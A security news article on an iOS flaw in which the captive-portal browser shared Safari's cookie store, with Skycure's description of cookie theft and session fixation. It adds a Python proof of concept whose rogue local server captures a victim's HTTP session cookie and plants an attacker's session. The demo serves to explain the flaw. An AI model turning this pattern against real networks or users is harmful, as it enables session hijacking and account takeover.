Apple has patched a flaw in its iOS mobile operating system that made it possible for attackers to impersonate device owners on websites that rely on unencrypted (plain HTTP) authentication cookies.
The vulnerability stems from a cookie store that iOS shared between the default Safari browser and a separate embedded browser used to handle the "captive portals" that many public Wi-Fi networks display on a device's initial connection. A captive portal is the web page that appears when you join a network for the first time, such as at a local cafe or a hotel: you must accept its terms of service before you can reach any other content on the network.
The shared store made it possible for attackers to build maliciously crafted captive-portal pages and tie them to a Wi-Fi network, according to a blog post published by the Israeli security firm Skycure. When a vulnerable iPhone or iPad joined such a network, the attacker's portal page could make the embedded browser contact a site of the attacker's choice, and because that browser shared Safari's cookie store, the network operator could read or overwrite the HTTP cookies the device held for that site. Skycure researchers explained:
This issue allows an attacker to:
- Steal users’ (HTTP) cookies associated with a site of the attacker’s choice. By doing so, the attacker can then impersonate the victim’s identity on the chosen site.
- Perform a session fixation attack, logging the user into an account controlled by the attacker–because of the shared Cookie Store, when the victims browse to the affected website via Mobile Safari, they will be logged into the attacker’s account instead of their own.
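The following is an added example, written for this page and not code from Skycure or Apple, that models the two outcomes above. A local HTTP server plays the rogue hotspot: because the attacker controls DNS on the network, every hostname the device asks for lands on that server, so the captive-portal landing page can embed an image from the target site and the server answers for the target as well. Python's `CookieJar` stands in for the iOS cookie store; one jar shared between the "portal browser" and "Safari" models iOS before 9.2.1, two separate jars model the isolated store the update introduced. The hostnames `target.example` and `portal.attacker.example` and the cookie values are constructed for the demo.

```python
"""Model of the iOS shared captive-portal cookie store (added example, not Skycure's or Apple's code)."""
import http.client
import threading
import urllib.request
from http.cookiejar import Cookie, CookieJar
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET = "target.example"                    # constructed: the site whose session the attacker wants
ATTACKER_SESSION = "attacker-session-id"     # constructed: session the attacker already holds on TARGET
VICTIM_SESSION = "victim-session-id"         # constructed: the user's real session on TARGET


class RogueHotspot(BaseHTTPRequestHandler):
    """Answers for every hostname, since the attacker controls DNS on the Wi-Fi network."""

    def do_GET(self):
        if self.headers.get("Host") == TARGET:
            # The portal page embedded http://target.example/..., so the embedded browser
            # attaches whatever cookies its store holds for TARGET, in clear text (theft).
            cookie = self.headers.get("Cookie")
            if cookie:
                self.server.stolen.append(cookie)
            # Session fixation: plant the attacker's session cookie for TARGET.
            self._reply(b"ok", "text/plain",
                        [("Set-Cookie", f"session={ATTACKER_SESSION}; Path=/")])
        else:
            # The captive-portal landing page itself, with a hidden image from TARGET.
            body = (f"<html><body>Accept the terms to continue"
                    f'<img src="http://{TARGET}/pixel.gif" width=1 height=1></body></html>')
            self._reply(body.encode(), "text/html", [])

    def _reply(self, body, ctype, extra_headers):
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        for name, value in extra_headers:
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def fetch(jar, url, port):
    """GET url using jar as the cookie store; every host is routed to the rogue server."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)               # cookies the store would attach to this request
    headers = {"Host": req.host}
    if req.has_header("Cookie"):
        headers["Cookie"] = req.get_header("Cookie")
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", req.selector, headers=headers)
    resp = conn.getresponse()
    body = resp.read()
    jar.extract_cookies(resp, req)           # store whatever Set-Cookie the server sent
    conn.close()
    return body


def seed_session(jar, value):
    """Give the jar a pre-existing, non-Secure session cookie for TARGET (constructed)."""
    jar.set_cookie(Cookie(0, "session", value, None, False, TARGET, False, False,
                          "/", True, False, None, False, None, None, {}))


def run_scenario(isolated):
    """Device already logged in to TARGET joins the hotspot, then opens TARGET in Safari.

    Returns (cookie headers the attacker captured, Cookie header Safari later sends to TARGET).
    """
    server = HTTPServer(("127.0.0.1", 0), RogueHotspot)
    server.stolen = []
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        safari = CookieJar()
        seed_session(safari, VICTIM_SESSION)
        portal = CookieJar() if isolated else safari   # isolated store (iOS 9.2.1) vs shared store
        # 1. iOS opens the captive-portal browser on the attacker's landing page.
        fetch(portal, "http://portal.attacker.example/", port)
        # 2. The embedded image is fetched through the portal browser's cookie store.
        fetch(portal, f"http://{TARGET}/pixel.gif", port)
        # 3. Later, the user opens TARGET in Safari: which session does it present?
        later = urllib.request.Request(f"http://{TARGET}/account")
        safari.add_cookie_header(later)
        return server.stolen, later.get_header("Cookie")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for isolated in (False, True):
        stolen, sent = run_scenario(isolated)
        print(f"isolated={isolated}: attacker saw {stolen}, Safari now sends {sent!r}")
```

With the shared jar the attacker captures `session=victim-session-id` and Safari afterwards presents the attacker's session, which is exactly the theft and fixation pair Skycure describes; with separate jars the attacker sees nothing and Safari keeps the victim's cookie. Note that only cookies without the `Secure` attribute ride along on the plain-HTTP image request, which is why the advisory scopes the theft to HTTP cookies; fixation is broader, because cookies are scoped by host rather than by scheme, so a cookie planted over HTTP is presented to the same host's HTTPS pages as well.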
What is most striking about this story is that Skycure researchers privately reported the vulnerability to Apple in June 2013. Two and a half years later, Apple has finally patched it in iOS 9.2.1, which gives the captive-portal browser its own isolated cookie store instead of sharing Safari's. Apple said there are no reports of the flaw being exploited in the wild.